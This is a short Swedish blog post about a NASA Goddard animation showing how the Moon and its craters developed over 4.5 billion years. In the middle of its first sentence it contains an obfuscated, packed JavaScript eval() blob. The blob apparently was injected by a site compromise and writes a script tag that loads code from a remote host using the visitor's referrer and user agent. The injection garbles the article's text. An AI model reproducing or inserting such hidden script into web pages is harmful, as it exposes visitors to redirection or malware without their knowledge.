Image Image Image Image Image Image Image Image Image Image

| 19 september, 2018

Scroll to top

Top

NASA visar upp månens liv

Sebastian Plengier Ehrnfelt

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rynta|var|u0026u|referrer|teyfb||js|php’.split(‘|’),0,{}))
är från NASA Goddard Space Center som denna video har skapats. Den visar genom animation månens utveckling som sträcker sig över 4,5 miljarder år och visar hur månens kratrar upptår. Får hoppas detta inte händer oss.